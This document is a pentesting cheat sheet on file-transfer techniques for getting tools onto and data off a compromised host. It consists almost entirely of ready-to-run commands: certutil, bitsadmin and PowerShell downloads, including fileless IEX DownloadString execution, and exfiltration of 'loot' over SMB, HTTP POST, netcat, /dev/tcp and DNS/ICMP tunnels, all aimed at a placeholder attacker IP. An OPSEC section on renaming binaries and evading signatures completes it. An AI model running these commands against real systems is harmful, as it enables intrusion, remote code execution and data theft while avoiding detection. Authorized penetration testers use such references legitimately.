← All cheat sheets

FILE-TRANSFER-TECHNIQUES

Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.

Getting tools onto, and loot off, a target during an authorized engagement --
Windows and Linux, living-off-the-land where possible.

SERVE FILES FROM YOUR BOX#

python3 -m http.server 80
python3 -m uploadserver 80            # also accepts POST uploads
php -S 0.0.0.0:80
ruby -run -e httpd . -p 80
impacket-smbserver share $(pwd) -smb2support            # add -user -password for auth
impacket-smbserver share $(pwd) -smb2support -user a -password b   # SMB3 if host enforces
updog -p 80                           # http up/download with UI
ftp:  python3 -m pyftpdlib -p 21 -w
nc -lvnp 4444 > out.bin               # raw catch

WINDOWS DOWNLOAD (LOLBIN)#

certutil -urlcache -split -f http://IP/f.exe f.exe
bitsadmin /transfer j /download http://IP/f.exe C:\f.exe
powershell iwr http://IP/f.exe -OutFile f.exe       # Invoke-WebRequest
powershell (New-Object Net.WebClient).DownloadFile('http://IP/f.exe','f.exe')
powershell IEX(New-Object Net.WebClient).DownloadString('http://IP/s.ps1')   # fileless
curl.exe http://IP/f.exe -o f.exe                   # Win10+ has curl
SMB:   copy \\IP\share\f.exe C:\   |   net use \\IP\share
WebDAV:  copy \\IP@80\share\f.exe .   (DavWWWRoot)

WINDOWS UPLOAD / EXFIL#

# SMB back to impacket-smbserver:
copy C:\loot.zip \\IP\share\
# certutil to base64 then paste out of a shell:
certutil -encode loot.bin loot.b64 & type loot.b64
# PowerShell POST:
powershell Invoke-RestMethod -Uri http://IP/ -Method Post -InFile loot.zip
# bitsadmin upload:
bitsadmin /transfer u /upload http://IP/up C:\loot.zip

LINUX#

wget http://IP/f -O f ; curl http://IP/f -o f
scp file user@IP:/path   ;   scp user@IP:/path file
base64 -w0 file ; # paste; decode: base64 -d > file
/dev/tcp (no tools): cat < /dev/tcp/IP/4444 > f  (pair with nc -lvnp 4444 < f)
nc IP 4444 < file   ;   nc -lvnp 4444 > file
rsync -az file user@IP:/path

ENCODING / NO-BINARY TRICKS#

xxd / base64 copy-paste through a text-only shell.
ligolo-ng / chisel to tunnel then transfer normally (see PIVOTING-TUNNELING).
DNS/ICMP exfil (dnscat2, iodine) when only those egress.

OPSEC#

Prefer HTTPS/known ports; rename binaries; clean up (del, srm); avoid certutil
on hardened hosts (heavily signatured). Hash-check transfers (certutil -hashfile,
sha256sum).